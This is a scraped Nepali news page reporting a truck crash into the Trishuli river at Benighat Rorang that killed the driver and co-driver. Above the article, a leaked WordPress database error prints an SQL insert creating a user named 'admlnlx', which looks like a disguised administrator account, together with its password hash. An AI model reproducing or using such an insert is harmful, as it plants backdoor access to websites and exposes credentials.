WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXLxv5l3Ynq3Uwa5TwBP0mutKzFikw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:16:06', '', 'admlnlx', 'admlnlx')
बेनीघाट रोराङ गाउँपालिकामा ट्रक दुर्घटना हुँदा आज दुई जनाको मृत्यु भएको छ । रुपन्देहीबाट सिमेण्ट लिएर काठमाडौंँतर्फ आउँदै गरेको लु १ ख ७७६३ नम्बरको ट्रक त्रिशूली नदीमा खस्दा काभ्रेपलाञ्चोक, बनेपा नगरपालिका नालाका चालक ४५ वर्षीय विष्णु घिमिरे र सहचालक २८ वर्षीय सुमन सञ्जेलको मृत्यु भएको छ ।
दुवैको ट्रकले थिचेर मृत्यु भएको र दुर्घटनाबारे अनुसन्धान भइरहेको इलाका प्रहरी कार्यालय गजुरीका प्रहरी निरीक्षक भोजराज पाण्डेयले जानकारी दिनुभयो । दुर्घटनाग्रस्त सवारी साधन त्रिशूलीमा परेको छ ।